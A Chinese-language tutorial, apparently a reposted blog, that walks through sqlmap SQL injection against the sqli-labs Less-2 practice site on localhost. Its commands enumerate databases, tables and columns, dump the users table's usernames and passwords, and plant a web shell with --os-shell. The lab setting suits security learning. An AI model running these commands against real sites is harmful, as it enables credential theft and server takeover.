使用sqlmap进行MySQL数据库的注入，sqlmap工具使用，sqlmap的参数详解

环境

phpstudy sqli-labs

本次注入中我们使用sqli-labs的less-2作为测试网站

使用sqlmap进行MySQL数据库的注入

检测是否存在注入

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1

显示payload详细信息

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1 -v 3

当前数据库用户是否是高权限用户

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1 --is-dba

查看当前用户的权限

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1 --privileges

爆数据库

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1 --dbs

爆当前数据库

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1 --current-db

爆所有数据库的所有表（比较慢，因为所有数据库中的表太多了）

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1 --tables

爆指定数据库的所有表

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1 -tables -D security

爆指定表的所有列

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1 -columns -T users -D security

爆指定列的指定字段

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1 -dump -C id,username,password -T users -D security

sqlmap写入shell

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1 --os-shell

这里我们是php的环境，我们选择4

这里我们选择2，自定义路径

选择接受标准输出

我们的文件夹中出现了写入的shell

参考博客

https://HdhCmsTestcnblogs测试数据/waw/p/10828237.html

使用sqlmap进行MySQL数据库的注入，sqlmap工具使用，sqlmap的参数详解

标签：查看   显示   mysql   word   log   targe   mys   less   code   

查看更多关于使用sqlmap进行MySQL数据库的注入，sqlmap工具使用，sqlmap的参数详解的详细内容...